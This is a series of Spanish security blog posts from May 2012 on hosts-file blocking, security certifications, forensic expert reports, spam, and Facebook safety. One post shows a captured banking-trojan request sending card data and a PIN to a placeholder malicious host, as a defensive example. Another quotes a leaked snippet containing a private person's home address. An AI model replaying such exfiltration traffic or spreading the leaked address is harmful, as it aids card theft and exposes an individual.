31 may 2012

Protección a nivel local, archivo hosts

Proporcionar protección a nivel local tendría que ser una de las principales medidas que se deberían de implementar en los equipos.

Una de las cosas bastante eficaces que se pueden es que a ciertos dominios/IP no nos podamos conectar, así nos protegeremos. ¿Como se consigue esto? Pues haciendo que dichas peticiones a ciertos sitios siempre vayan 127.0.0.1 es decir, a localhost.

¿Esto de que nos libra?

Pues nos libra de que si navegamos por ejemplo por páginas webs legítimas, que contienen por ejemplo un iframe a un “conocido” host que contiene malware la conexión no se realizará.

Otro caso es por ejemplo el de troyanos que se dedican por ejemplo a pedirte los datos bancarios “por seguridad”. Obviamente estos troyanos lo que buscan es engañar al usuario para que introduzca sus datos bancarios y poder enviarlos a un host destino.

Si miramos ese tipo de trazas con Wireshark, veríamos algo del tipo

POST /images/check.asp HTTP/1.0Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 962Host: DOMINIO_MALICIOSOAccept: text/html, */*User-Agent: Mozilla/3.0 (compatible; Indy Library)1=45678976&2=1234&3=1234&4=47897654&5=4567&6=5467&7=5879654774587741&8=06%2F14&9=887&10=7188&11=145%2D4564&12=146%2D5646&13=147%2D5456&14=148%2D4564&15=149%2D5645&16=150%2D6156&17=151%2D1894&18=152%2D8918&19=153%2D9189&20=154%2D1891&21=155%2D8984&22=156%2D5445&23=157%2D6156&24=158%2D1561&25=159%2D5615&26=160%2D6118&27=161%2D9948&28=162%2D9489&29=163%2D1891&30=164%2D8918&31=165%2D1891&32=166%2D8189&33=167%2D1891&34=168%2D8918&35=169%2D9189&36=170%2D1891&37=171%2D8918&38=172%2D1891&39=173%2D1998&40=174%2D1891&41=175%2D8918&42=176%2D9115&43=177%2D1561&44=178%2D1156&45=179%2D1565&46=180%2D1561&47=181%2D5619&48=182%2D1984&49=183%2D8948&50=184%2D9189&51=185%2D1891&52=186%2D9919&53=187%2D8189&54=188%2D1891&55=189%2D8918&56=190%2D9189&57=191%2D1189&58=192%2D1891&59=193%2D8918&60=194%2D9189&61=195%2D8918&62=196%2D9891&63=197%2D8918&64=198%2D9189&65=199%2D1981&66=200%2D8918&67=201%2D9189&68=202%2D1981&69=203%2D8918&70=204%2D9811&71=manodacaixa%40gmail%2Ecom&HTTP/1.1 200 OKConnection: keep-aliveDate: Tue, 22 May 2012 12:40:57 GMTServer: Microsoft-IIS/6.0MicrosoftOfficeWebServer: 5.0_PubX-Powered-By: ASP.NETContent-Length: 0Content-Type: text/htmlSet-Cookie: ASPSESSIONIDASSSCADB=BIJLMGIBAJPPPDFIDBPMKBJH; path=/Cache-control: private

Todo el “churro” que se envía son los datos que el usuario ha rellenado sobre su tarjeta, su PIN etc…

Si el HOST destino, ya se conoce como malicioso los datos nunca se enviarían, es decir, nos ofrece protección en la navegación y en el envío de datos a URL/Ip maliciosas.

Otro tipo de troyanos, lo que hacen es, una vez que han infectado la máquina se descargan mas binarios de su servidor que les hace de panel de control (C&C).

Se podría mitigar también redirigiendo las peticiones a localhost.

Y es  por eso, por lo que proyectos como hphosts nos ayudan en esta tarea.

Descargamos el archivo de aquí

¿Que tenemos en este archivo?

C:\Users\seifreed\Downloads\hphosts>wc -l HOSTS.txt183792 HOSTS.txt

Tenemos  183792 entradas repartidas entre IP’S y URL que son de carácter malicioso, de manera que si intentan conectarse fallarán.

Y eso es todo por hoy ;)

30 may 2012

Soy Auditor de Seguridad. ¿En qué me puedo certificar? Parte II

Buenas a todos, en el post de hoy continuaremos con la cadena de artículos sobre certificaciones de seguridad charlando sobre cuatro nuevas certificaciones que se suelen pedir habitualmente a los auditores/consultores de seguridad de la información:

  • OSCP: siglas de Offensive Security Certified Professional. Es una certificación de la gente de Offensive Security, creadores de Backtrack, lo que ya os da una pista de qué acreditará la certificación. Se obtiene de una manera diferente a otras certificaciones, no hay tests multirespuesta que den lugar a dudas (como indican desde su sitio web) y el examen es púramente práctico. Se realiza en un laboratorio y consiste en pasar una serie de pruebas hacking por las que se irán proporcionando puntos, lo que nosotros llamaríamos CTF o Reto Hacking, pero que acaba en la obtención de una certificación en vez de un iPad o una bolsa de ganchitos. No es tan conocida como si pueda ser el CEH por ejemplo, pero certifica que el que obtiene la certificación es realmente un experto en seguridad a nivel técnico.

 

  • CISSP: siglas de Certified Information Systems Security Professional. Es una certificación de la International Information Systems Security Certification Consortium (ISC)2, que tiene como objetivo reconocer a los profesionales con una formación en el área de seguridad de la información. Tiene un alcance genérico y abarca en su temario, bastante técnico, aspectos que van desde la criptografía y la seguridad de aplicaciones a aspectos legales y regulatorios. De las certificaciones exclusivas de seguridad, es una de las más valoradas.

 

  • CRISC: siglas de Certified Risk & Information System Control. Es una certificación de ISACA (como CISA y CISM, de las que ya hablamos en el anterior artículo) creada en 2010, y destinada a reconocer las capacidades profesionales para diseñar, implementar y mantener sistemas de información para mitigar riesgos. La certificación requiere las mismas condiciones de CISA y CISM para su obtención (examen tipo test y 5 años mínimos de experiencia).

 

  • ITIL: siglas de Information Technologies Infrastructure Library. Es un conjunto de mejores prácticas para la dirección y gestión de servicios de tecnologías de la información creadas por la OGC (Office of Government Commerce). ITIL se distribuye en un conjunto de libros que tienen como objetivo la mejora de la calidad de los servicios de tecnologías de la información que presta una organización. ITIL a diferencia de estándares como los de ISO o modelos como CMMI del SEI, no certifica organizaciones, pero sí certifica personas, a las que acredita como expertos en gestión y dirección de tecnologías de la información. La certificación no es exclusiva de seguridad, si no que es mucho más amplia (como CISA), pero es una de las certificaciones más solicitadas a auditores. Cuenta con varios niveles que arrancan en el "Itil Foundation", el más sencillo de obtener, hasta el "Itil Máster"

¿Y vosotros tenéis alguna de las certificaciones de las que hemos hablado hoy? ¿Os parecen útiles? ¿Las recomendaríais?

saludos!

29 may 2012

Un Forense llevado a juicio (VIII de X)

Un Forense llevado a juicio (I de X)Un Forense llevado a juicio (II de X)Un Forense llevado a juicio (III de X)Un Forense llevado a juicio (IV de X)Un Forense llevado a juicio (V de X)Un Forense llevado a juicio (VI de X)Un Forense llevado a juicio (VII de X)Un Forense llevado a juicio (VIII de X)Un Forense llevado a juicio (IX de X)Un Forense llevado a juicio (X de X)


Prueba anticipada en un proceso Civil

En determinadas circunstancias un análisis forense puede llegar a un punto muerto o bien a unas conclusiones “inconcluyentes” porque la información necesaria se encuentra fuera del alcance del investigador, en manos de un tercero. Por ejemplo en un análisis de una intrusión en los log podrían haberse quedado reflejadas unas direcciones IP públicas de las que solo el proveedor conoce a quién ha podido ser adjudicada en una fecha y hora concretas. En ocasiones he visto como se iban a desechar esas pruebas ante la creencia de que no podría obtenerse la información correlacionada del ISP.

Obtener esos datos resulta totalmente vital pues es la información precisa que permitirá en condiciones adecuadas motivar un hecho o en otras incriminar a una determinada persona. Puesto que bajo ninguna circunstancia tendremos acceso a la información y elucubrar sobre la posibilidad, aunque factible, no tiene validez en el juicio al no poder probar nada, será necesario solicitar la información. También resulta muy importante obtener la información debido al carácter volátil de las pruebas y la posibilidad de que puedan ser destruidas. Por ejemplo que el proveedor de Internet deseche los registros relativos a las conexiones de sus abonados.

Este procedimiento se denomina solicitud de prueba anticipada. Su base se encuentra en la protección del derecho fundamental a la prueba. Puesto que existe el riego de que una prueba pudiera no practicarse porque hay que esperar a que llegue el tiempo necesario a la fase de procedimientos para su práctica, se requiere el adelantamiento de la prueba. Aunque el proceso judicial no haya sido iniciado podrá solicitarse que se practique el proceso de solicitud anticipada.

La Ley 1/2000 de Enjuiciamiento Civil a través de su sección IV que comprende los artículos del 293 al 298 recoge precisamente el ordenamiento de la prueba anticipada. Dicho proceso puede ser invocado por cualquiera de las partes, debiendo ser motivada y solicitada al tribunal que está llevando el caso siempre con anterioridad al inicio del juicio.

El escrito es remitido por el abogado que llevará el caso ante el juzgado que correspondiera, a través de una súplica de oficio. En este sentido es recomendable que el escrito sea revisado por el analista forense. Aunque está claro que el lenguaje judicial se encuentre fuera del alcance del investigador sería recomendable aconsejar técnicamente puesto que pueda ser factible que se pueda cometer un error  a nivel técnico que haga imposible atender la súplica.

Adicionalmente a otras peticiones que puedan ser cursadas mediante este procedimiento, las más relacionadas con las pruebas informáticas, suelen ser aquellas que poseen los proveedores de Internet. El ejemplo anterior de direcciones IP públicas, datos de envío de SMS, uso de Smartphone o identificación de correos electrónicos son algunas de las circunstancias que haría necesario la acción de un tercero.

Toda la información que pueda ser aportada en este sentido resulta sumamente crítica, debiendo afinar lo máximo posible para hacer factible la petición. Por ejemplo si se conoce la o las direcciones IP (habitual en el uso dinámico de las mismas), sería conveniente determinar cuál es el proveedor asociado a la misma. De esta forma la petición al juzgado puede ser encaminada de la forma correcta.

Existe la tendencia a dudar de pruebas donde puedan existir conexiones con un patrón similar pero que procedan desde direcciones IP de diferentes proveedores. La primera impresión que se tiene, es que el análisis ha sido llevado de forma incorrecta. Se duda a la hora de realizar la solicitud por miedo el fracaso o un resultado no esperado. Sin embargo se dan muchas circunstancias para que este hecho sea factible:

  • Que existan actores diferentes implicados en el hecho.
  • Que haya un único actor pero que ha operado por ejemplo desde su casa y la de un familiar o algún amigo.
  • Que sea un único actor pero haga uso de diferentes tecnologías. Por ejemplo uso de  ADSL y Smartphone que impliquen a diferentes proveedores.

La petición debe ir acompaña de toda la referencia máxima que pueda ser aportada. Por ejemplo en el caso de las direcciones IP, deben aportarse los datos del proveedor y fecha y hora de la conexión. Hay que tener en cuenta en esta circunstancia las posibles discrepancias que pueden tener los ficheros de Logs con las horas locales reales donde opere el proveedor.

Estas pruebas suelen ser determinantes para un juicio y por lo tanto hay que hacer todo lo factible para obtenerlas. Es indudable que ante una información que solo puede aportar un tercero, como que en una fecha concreta una IP está asociada directamente a uno de los actores, ésta cobra importancia extrema en el juicio. La imparcialidad total del tercero, al no conocer ni estar involucrado en la causa, hace que la prueba tome mucha fuerza si el abogado la utiliza apropiadamente. Por lo tanto la súplica deberá realizarse con la debida anticipación para que las pruebas puedan llegar a tiempo a la vista.

Ahora ya conocéis una de las figuras importantes que puede anteceder al juicio en un proceso forense. Evidentemente la estrategia de cara al juicio puede influir decisivamente el resultado obtenido de la solicitud de prueba anticipada.

28 may 2012

¿SPAM dirigido?

El SPAM ha sido y es, uno de los mayores problemas de internet. La gente que se dedica a sistemas y a seguridad se pasa mucho tiempo modificando los filtros de los servidores de correo para que los usuarios no sufran esa oleada de mensajes que suelen contener, malware, fraude, phishing etc..

Y es por eso que es un gran problema tanto para organizaciones como para usuarios finales.

En una de mis cuentas de Gmail, he recibido un mensaje de correo electrónico,

Cuando recibí el correo, lo primero que me paré a pensar es que mi registrador de dominio había cambiado las notifcaciones..

Pero en el precio y el formato del mensaje estaba la trampa. El precio era excesivamente mas caro de lo que pago yo cada año, así que me dio a  sospechar enseguida. Además en la dirección del correo en el De: el dominio era muy raro.

Lo que no había visto hasta ahora es que te incluyeran datos reales de tu whois. Si hace sun whois a seifreed.com

Domain Name: seifreed.comRegistrant Contact:Privacidad WhoisPrivacidad Whois slseifreed_com872@privacidadwhois.comAP 570Santiago de Compostela A Coruna15080 ESTelf: +34.627089328

Evidentemente los datos del teléfono no son correctos, que para eso funcionan los whois privado :P

Cuando hablaba de SPAM dirigido lo decía porque, por ejemplo si miramos el dominio de email desde el cual se ha enviado el correo de SPAM, podemos ver.

Podemos ver toda la estructura a la que pertenece dicho dominio, hasta llegar a:

Vaya, parece que se dedican a registrar dominios realmente..

En fin otra campaña mas de SPAM a usuarios finales.

27 may 2012

Informe Flu – 73

Comenzamos con el resumen de la semana:

Lunes 21 de Mayo

Martes 22 de Mayo

Miércoles 23 de Mayo

Jueves 24 de Mayo

Viernes 25 de Mayo

Sábado 26 de Mayo

  • LeakidIn, cuidado con la información que dejas por ahí, un sitio en forma de blog dónde se filtra información interesante.
  • El libro de un amigo y compañero en i64, Juan Miguel Aguayo Sánchez, sobre desarrollo en dispositivos iOS,¿y tu quieres aprender a desarrollar en iOS?

26 may 2012

¿Quieres aprender a desarrollar en iOS?

Hoy os dejo una entrada sobre el libro de un compañero y amigo en informática 64, como es Juan Miguel Aguayo Sánchez. Juanmi ha trabajado lo impensable para escribir este libro y todo su esfuerzo se ve reflejado en la calidad de la información, tanto en metodología como en técnica, de este libro.

"Hoy día es innegable el imparable crecimiento que han tenido las tecnologías de los dispositivos móviles en los últimos años. El número de smartphones, tablets, etc. han aumentado de manera exponencial. Esto ha sido así, hasta tal punto que actualmente estos dispositivos se han posicionado como tecnologías de máxima prioridad para muchas empresas. Incluso algunas han decidido dedicarse en exclusiva al desarrollo de aplicaciones móviles para llenar este productivo mercado."

"Dentro de todas estas nuevas tecnologías, Apple ha sido pionero en muchas de ellas y en una gran mayoría de los servicios asociados a estos dispositivos, consiguiendo con esto que su sistema operativo móvil, es decir iOS, sea uno de los dominantes en este mundo.Con este libro se pueden adquirir los conocimientos necesarios para desarrollar aplicaciones en iOS, guiando al lector para que aprenda a utilizar las herramientas y técnicas básicas para iniciarse en el mundo iOS. El libro trata de presentar los temas de una manera más o menos práctica, en donde se presentan unos conceptos teóricos, y posteriormente se presenta un proyecto o ejercicio práctico, guiado paso a paso, de manera que el lector pueda ir implementando el ejercicio por sí mismo.El libro es un manual tanto para aquellos que se inician, como para los que ya tienen algo de experiencia. El libro pretende sentar unas bases, de manera que al finalizar la lectura, el lector pueda convertirse en desarrollador iOS y enfrentarse a proyectos de este sistema operativo por sí mismo."

Os recomendamos la lectura del libro, dispone de un precio totalmente asequible, por lo que no dudes en adquirirlo si quieres  aprender a desarrollar en dispositivos móviles iOS.

Leakedin – Cuidado con la información que te dejas por ahí …

En cuanto expones un dato personal en Internet estás perdido.Hay que tener mucho cuidado con lo que se va dejando por ahí, un log en Pastebin, Metadatos en los documentos, son cosas que cada vez hay que concienciarse de que no se deben tomar a la ligera.Ya existen herramientas que monitorizan Pastebin, de manera que cuando aparece un dato de interés a los que estan detrás de esa informaciónes les es, muy fácil el poder enterarse.Otro tipo de servicios es el que traigo se trata leakedin, Este servicio se encarga de dar a conocer en que sitios (Pastebin), se ha colgado información que podria ser, mas bien información personal.  Un archivo subido a Dropbox, una clave RSA etc..Podemos encontrara cosas como:
Detected 1 occurrence(s) of ‘http[s]*:\/\/dl\.dropbox\.com\/’:
<img src="http://dl.dropbox.com/u/149660/389075560.jpg">Send a SELF-ADDRESSED STAMPED ENVELOPE (this means it has your address already written on it and an unused stamp in the upper-right corner!) to:Ben Combee<br>5607 Joe Sayers Ave<br>Austin, TX 78756<br>If you include somethin
Sin duda interesante.La web del proyecto la podéis encontrar aquí.Tened cuidado lo que vais dejando por ahí.

25 may 2012

Soy Auditor de Seguridad. ¿En qué me puedo certificar? Parte I

Buenas a todos, cuando finalizamos nuestros estudios y damos el salto al mundo laboral casi todos hemos tenido la ingenua idea de que el estudiar se iba a acabar. En muchas profesiones esto ocurre así y no hay que darle más vueltas a la tortilla, pero en la nuestra, y por nuestra me refiero a la seguridad de la información  y a la informática en general, nada más lejos de la realidad. Cuando uno finaliza sus estudios, ya sean universitarios o de formación profesional y salta al mercado laboral (dejando a un lado el doctorado, que de eso hablaré otro día), nos damos cuenta que en este mundo tan exigente nos veremos obligados a mantenernos actualizados en nuestro oficio para ser competitivos, y es más, no solo vale con actualizarnos, sino que hay que demostrarlo, ¿cómo?, pues sencillo, con títulos y certificaciones. A día de hoy nos encontramos con otro plus, y es que viendo el panorama laboral con un 25% de paro en España, hay mucha más competencia a la hora de conseguir un trabajo, y los títulos y certificaciones pueden ser la nota que te haga estar dentro o fuera del proceso de selección que te separa de ver los billetes verdes a fin de mes o seguir viendo a la misma gente en la cola del INEM. Es altamente probable que las certificaciones no definan si eres bueno o malo en tu puesto laboral, pero se tienen muy en cuenta a la hora de seleccionar gente. Es más, una vez que hayas entrado en una empresa, verás como los clientes exigen que el personal que realice los trabajos que solicitan se encuentren certificados en X o en Y, por lo que se te exigirá que vayas obteniendo nuevas certificaciones, ya sabes el dicho de renovarse o morir. Resumiendo, puedes ser muy bueno en tu oficio, pero si no tienes alguna mínima oportunidad de demostrarlo..., o bien tienes cartas de recomendación o necesitarás títulos y certificaciones que acrediten tus bondades.

Después de esta parrafada, en esta cadena de artículos que hoy damos comienzo (y que será muy larga, ya veréis), debatiremos (esperamos más que nunca vuestros comentarios y feedback) sobre las certificaciones que más se solicitan en la empresa en temas de seguridad informática.

Hoy comenzaremos por cuatro de las certificaciones que más se solicitan habitualmente, CISA y CISM, de Isaca y CEH y CHFI, de EC-Council.

  • CHFI (siglas de Computer Hacking Forensic Investigator) es una de las certificaciones más valoradas de EC-Council y que acredita a un investigador forense. Esta certificación se centra en garantizar que el profesional que la posea tiene, al menos, los conocimientos necesarios para extraer evidencias digitales de un escenario que puede comprender distintos sistemas de información. Lo bueno de ser una certificación de EC-Council, es que cuentan con la acreditación ANSI 17024, por lo que se garantiza que es una organización seria y que vela por unos procesos de certificación de alto nivel y valoración. La certificación se obtiene pasando un examen en inglés.
  • CEH (siglas de Certified Ethical Hacker) es otra certificación oficial de EC-Council orientada a acreditar a un profesional del hacking ético que se ocupe de la realización de intentos de intrusión en redes y sistemas. En esta certificación, muy técnica si se compara, por ejemplo, con el CISM, se certifica que el poseedor tiene unos conocimientos bastante completos en seguridad informática, que van desde los ataques en redes de datos hasta ataques web y criptografía.
  • CISA (siglas de Certified Information Systems Auditor) es con toda probabilidad una de las certificaciones más valoradas en la empresa. Creada por ISACA, esta certificación sigue operativa desde 1978 (muchos años sí) y exige contar con una experiencia profesional mínima de cinco años en Auditoría, Control y/o Seguridad de Sistemas de Información para obtenerla. Podéis presentaros al examen sin llegar a los cinco años de experiencia, aprobarlo, y una vez que tengáis los cinco años realizar el trámite para obtenerla. Como pro podéis cambiar hasta dos años de experiencia si tenéis una carrera superior, o una técnica y un máster. La certificación CISA se apoya en la Norma ISO 17024:2003, no es solo de seguridad como si pasa por ejemplo con CEH, CHFI o CISM, e incluye otros temas de auditoría más genéricos que no está de más saber. Es posible que durante los exámenes te encuentres con preguntas que tú, con tu experiencia, responderías de otra manera (como ya se ha debatido largo y tendido en distintos blogs y foros de Internet), pero leyendo el libro e incluso sin leerlo, haciendo tests, aprenderás la "visión de Isaca" y responderás correctamente a la mayoría sin problemas.
  • CISM (siglas de Certified Information Security Manager), también de ISACA, se apoya en la Norma ISO 17024:2003 (al igual que el CISA). y a diferencia de la anterior, esta si se centra exclusivamente en la administración de seguridad de la información.  La certificación se orienta más a gestión que a aspectos técnicos. Los aspectos técnicos que cubre los dominaréis sin problemas si os movéis por este mundillo (por ejemplo, saber que es una SQLi, un XSS, un MiTM, un Firewall o una clave pública/privada). Al igual que en el CISA se exigen cinco años de experiencia, que se pueden reducir a tres con una ingeniería superior o una técnica y un máster.

El próximo día continuaremos hablando de más certificaciones, saludos!

24 may 2012

CRASH: Conferencias de seguridad en Albacete, organizadas por navajanegra

Albacete, a pesar de ser una ciudad pequeña, ha dado (y sigue dando) muy buenos profesionales del sector de las TIC. Lamentablemente nadie es profeta en su tierra y gran parte de los que allí estudiamos y nos dedicamos a las nuevas tecnologías hemos tenido que emigrar a otras ciudades (¡e incluso países!)

Por este motivo pensamos: ¿por qué no hacer unas charlas de seguridad, nuestra pasión, impartidas por gente de albaceteña? Y así es como nacieron las charlas CRASH, organizadas por “navaja negra”.

Hace semanas que no quedan entradas para esta primera edición, lo cual supera todas nuestras expectativas y nos anima a trabajar para las siguientes.

Aquí os dejamos un pequeño resumen de lo que se expondrá:

  • Engañando a enemigo: aprenderemos a engañar a los malos y a estudiar sus ataques. ¿Qué mejor para protegernos que saber cómo nos atacan, verdad? Impartida por Academia Madesyp (www.madesyp.com)
  • Disfrazando nuestros servidores: un paso a paso sobre cómo evadir las técnicas anti-fingerprinting y cómo ir un paso más allá, haciendo que nuestro apache parezca un IIS! Impartida por cr0hn (@ggdaniel )
  • Seguridad en IPv6: IPv6 está en muchos medios últimamente, pero… ¿sabéis que implicaciones de seguridad y nuevos ataques conlleva la última versión del protocolo de internet? Impartida por Rafa Sánchez (@r_a_ff_a_e_ll_o)
  • (in)seguridad en aplicaciones Java: ¿Sabéis cuáles son los ataques más comunes en entornos web y cómo nos ayudan framework de Java como Struts o Hibernate? Impartida por Francisco Honrubia (http://es.linkedin.com/in/fcohonrubia)
  • Implantación ISO 27001: ¿Sabéis que es la ISO 27001? Seguramente sí, pero… ¿qué pasos han de seguirse y qué beneficios tiene implantarla? Impartida por Luis García (http://www.clickalba.com/)

Las conferencias serán este sábado día 26. Y todas las transparencias y materiales se liberarán de forma pública después de las charlas.

Podéis encontrar más información en nuestra página web: http://navajanegra.com

Artículo enviado por cr0hn de navajanegra.com

23 may 2012

Herramientas forense para ser un buen CSI. Parte VII

Buenas a todos, hoy continuaremos la cadena de entradas sobre herramientas forense hablando de una aplicación que nos podría ser de mucha utilidad a la hora de recuperar archivos y carpetas eliminadas en un equipo, la herramienta EASEUS Data Recovery Wizard.

EASEUS Data Recovery Wizard nos permitirá restaurar archivos borrados de un disco, así como particiones que hayan sido eliminadas. Su uso es muy sencillo, se basa en un Wizard, como su nombre indica, con tres opciones básicas:

  • Recuperar archivos eliminados
  • Restaurar todos los ficheros de una partición
  • Restaurar una partición

A continuación os mostramos los pasos a seguir para restaurar todos los ficheros eliminados de una partición (si todavía fuese posible):

1.- Seleccionamos la opción "Complete Recovery":

2.- Seleccionamos el tipo de los archivos que estamos buscando:

3.- Seleccionamos la partición:

4.- A continuación arrancará el proceso de recuperación y se nos mostrará una ventana con el estado actual:

5.- La herramienta mostrará un reporte del proceso de recuperación con los archivos y carpetas localizados:

Como véis el uso de la aplicación es muy sencillo y puede llegarnos a ser de mucha utilidad.

Saludos!

22 may 2012

Estando más seguro en Facebook

Las redes sociales se han convertido en el uso diario por muchos usuarios, muchas veces los usuarios no se dan cuenta de la peligrosidad que a veces pueden tener estas redes sociales. Ya que, en ellas se puede distribuir malware, o se pueden robar cuentas y usar para hacer un mal uso de imagen.

Facebook es una de las redes sociales mas usadas, y no se libra de ser víctima de ataques por partes de los criminales.

Por ejemplo la noticia que salió hace tiempo de que los usuarios de Facebook, fueron víctimas de un ataque de SPAM

Una de las recomendaciones que se dan en seguridad, no solo en las redes sociales es elegir una buena contraseña

  • Elegir una contraseña fuerte, que contenga letras, número y símbolos y si es posible mayúculas y minúculas.
  • No la compartas con nadie
  • No uses la misma contraseña para todas tus cuentas
  • Cambia la contraseña regularmente

Si recordar una contraseña compleja nos cuesta, existen utilidades para recordar este tipo de cuentas. Una de las utilidades que mas me gustan es Keepass.

Realizar Logout de Facebook

Es muy importante coger la costumbre de realizar Logout en Facebook y en los demás servicios ya que, si cogemos esa costumbre cuando hagamos login fuera de nuestro entorno diario, que puede ser nuestro puesto de trabajo o nuestra casa nos recordaremos de desconectar ya que otro usuario podría entrar en nuestra cuenta si no hemos salido de manera correcta.

Scam en Facebook

El Scam es una de las armas que se usan en Internet para seguir consiguiendo que los usuarios caigan en este tipo de fraudes y sean, infectados por malware o bien sean conducidos a un phishing.

 

Código malicioso en Facebook

Existen ciertos códigos maliciosos que, mediante anuncios en ciertas páginas invitan al usuario, mediante ingeniería social a realizar ciertas acciones que por ejemplo mediante código malicioso recoger todas nuestras amistades y ponerles un video o el enlace a malware.

Clickjacking

Este tipo de amenaza es poco conocida y muy peligrosa para los usuarios finales.

En este tipo de amenazas, por ejemplo el usuario clica en un Me gusta y en realidad por debajo esta realizando otras acciones

Conectando a Facebook por HTTPS

Es muy importante conectarse por HTTPS, ya que ciframos nuestras conexiones y nuestros datos viajan seguros :D

Estos son algunos de los consejos que podéis seguir.

21 may 2012

Un Forense llevado a juicio (VII de X)

Un Forense llevado a juicio (I de X)Un Forense llevado a juicio (II de X)Un Forense llevado a juicio (III de X)Un Forense llevado a juicio (IV de X)Un Forense llevado a juicio (V de X)Un Forense llevado a juicio (VI de X)Un Forense llevado a juicio (VII de X)Un Forense llevado a juicio (VIII de X)Un Forense llevado a juicio (IX de X)Un Forense llevado a juicio (X de X)


El informe pericial

El informe constituye, sino el más importante, uno de los elementos esenciales en un caso forense. Hay que tener presente que por muy buenos que hayan sido los procedimientos llevados a cabo, las técnicas empleadas y los resultados obtenidos, si no se reflejan correctamente en un documento, no tendrán valor alguno. Al final, al igual que en una auditoría, el valor del mismo reside en el documento y por eso seremos valorados.

Un informe de este tipo, presenta sus características y hay que tener presente que aunque la carga técnica resulta importante el objetivo final es transmitir también una parte de él a personas que en muchas ocasiones no tienen una relación directa con la informática, son meros usuarios. Por lo tanto conjugar el arte de hacer lo técnico (no olvidemos que no deja de ser un pericial) entendible, es quizás el mayor reto de todos. Al enfrentarse al papel en blanco hay que obviar el primer hecho de intentar parecer el más de los gurús técnicos. Algo no entendible pierde todo su valor de cara al juicio. Es más el propio abogado tendrá complicado la defensa si no es capaz de conocer la información esencial. Algo como una dirección IP para un neófito en tecnología puede suponer un problema a la hora de entender el informe.

Hay que tener presente siempre en su elaboración la independencia de la que parte el perito, reflejando la realidad de los resultados. Aunque existirá una tendencia a reflejar cierta parcialidad en las conclusiones, esto no debe condicionar su elaboración.

 Hay que tener en cuenta que un informe debe tener una línea maestra definida. No pueden plantearse unos objetivos de inicio y acabar hablando de lo divino y lo humano. Debe ser consecuente y por lo tanto no dejar hilos sueltos sin haberlos atado, puesto que podría arrojar dudas sobre la validez del documento.

El informe tiene un tempo en su desarrollo, dimensionado a través de las diferentes fases:

  • Antecedentes.
  • Evidencias.
  • Análisis y tratamiento.
  • Resultados.
  • Conclusiones y/o recomendaciones.

Los antecedentes suponen la mejor forma para iniciar el informe. Debe reflejar tanto los objetivos, como las reuniones iniciales. Es importante definir los motivos por los que se ponen en contacto con nosotros para iniciar el proceso definiendo así el alcance del mismo. Estos objetivos constituyen la línea maestra de la investigación y las conclusiones deben ser fiel reflejo de haberlos culminado (en un sentido o en otro).

Es importante también exponer a través de los antecedentes las líneas temporales que habrán formado parte de los análisis y en qué medida se relacionan con el caso.

El segundo punto es de los críticos: la presentación de las evidencias. Hay que recordar que estas son la piedra de toque del informe. Tal y como hemos reflejado en los anteriores post su identificación, recogida y almacenamiento es  clave para la elaboración del informe. Los procedimientos empleados deben reflejarse en el informe, para garantizar siempre que se han llevado a  efecto las buenas prácticas en su mantenimiento, evitando cualquier manipulación de las mismas que pudiera implicar un perjuicio a cualquiera de las partes.

Hay que enumerarlas y facilitar toda la información que se pueda de ellas. De dónde han salido, cuál es la motivación para su obtención, los fundamentos de su adquisición, cómo se han tratado, copias existentes de las mismas, quién las ha recogido, almacenado y analizado, son algunas de las cuestiones que debe reflejar el informe con respecto a las mismas. Sería importante definir también en el informe (cuando sea factible) los fundamentos existentes que muestren la no manipulación de las pruebas. Por ejemplo a través de la firma tomada de las mismas.

Si hubiera alguna evidencia delicada en lo concerniente a su modo de adquisición, podría motivarse el porqué de la metodología empleada (ahondando en las precauciones que se han tomado) y la importancia de su relación con respecto al caso. Si determinadas evidencias han sido adquiridas una vez que la línea de investigación ha sido iniciada, deberá también indicarse, así como el motivo para ello. Por ejemplo en las pruebas iniciales se detecta parte de una conversación mantenida desde un equipo X, se procede por ello a realizar un análisis del mismo adquiriendo su disco duro.

Los resultados y conclusiones deberán derivarse de las evidencias presentadas. Si hay conclusiones que se proporciona sin un sustento en las evidencias, serán tomadas como elucubración y por lo tanto su valor puede ser puesto en entredicho. La valoración del perito es válida mientras demuestre su imparcialidad, pero con las evidencias bien definidas afianza siempre esta postura.

El tratamiento de las evidencias adquiridas es el siguiente punto del informe. El análisis de las mismas proporcionará unos datos de los cuales se espera una relación. El factor fundamental para la exposición, debe ser el de causa-efecto. Es interesante en este sentido atender al principio de intercambios de indicios o de Locard, que aunque aplicados fundamentalmente a los indicios o evidencias físicas, pueden ser tenidos en cosideración también en las de tipo digital.

En el caso de que el análisis detecte la existencia de patrones, deberán citarse como un aspecto importante a la hora de elaborar las conclusiones. El análisis debe ser escrupuloso, metódico y cuidadoso en su ejecución. La falta de método se refleja en gran medida en el informe, produciendo unos resultados muy difíciles de consolidar e hilvanar.

La fase de análisis debe ir proporcionando paulatinamente los resultados, dosificándolos en su justa medida y preparando las últimas fases del informe. Esta fase estará cargada de tecnicismo lo que deberá ser contrarrestado con un anexo en forma de glosario que permita de una forma clara y comprensible explicar los mismos. También serán presentados como anexos aquellos resultados que puedan resultar repetitivos y que aunque de importancia, desvistan al informe de su peso específico. Por ejemplo si se ha realizado un análisis de múltiples ficheros de logs, estos deberían condensarse en una serie de tablas descriptivas en el informe y presentarse como anexos toda la información tratada, referenciándose en el documento.

Los diferentes análisis deben establecer si fuera necesaria la correlación existente entre ellos, pero no deberían anticiparse las conclusiones, fundamentalmente para no obviar los hechos en el punto final. Si se considera importante anticipar a través de los análisis una determinada información o relación, deberá volverse a exponer en las conclusiones, aunque pueda parecernos reiterativo. Es factible que determinadas personas solo revisen resultados y conclusiones.

Los análisis deben reflejar la pericia del investigador. Aunque también muestran las eficacias de los métodos y aplicaciones empleadas, deben dejar siempre paso a la labor pericial (por lo menos en España donde no existen las herramientas validadas, ni aquellas que su empleo garanticen un éxito de cara al juicio).

La exposición de resultado es una continuación de la fase de análisis. Aquí se definen toda la información obtenida y que pude ser relevante para el caso. Aunque en mente se encuentre ya la correlación de los datos, es una tarea que debe ser más propia de las conclusiones, aunque puede irse ya definiendo peculiaridades. Los datos deben ser fríos y mostrar el fiel reflejo del análisis. Deben prestarse el hilo conductor de la investigación, reflejando y realzando los más significativos frente a los menos importantes. Deberemos tener en cuenta todos, sean o no favorables, puesto que siempre hay que pensar en un posible contrapericial.

En la medida de lo posible la presentación de resultado debe ser acorde a la línea temporal definida a través de los antecedentes y que junto con otros elementos definen el hilo conductor del caso. Información sensible, particularidades, referencias y un largo etcétera de elementos deberán ser parte también de la presentación de los hechos.

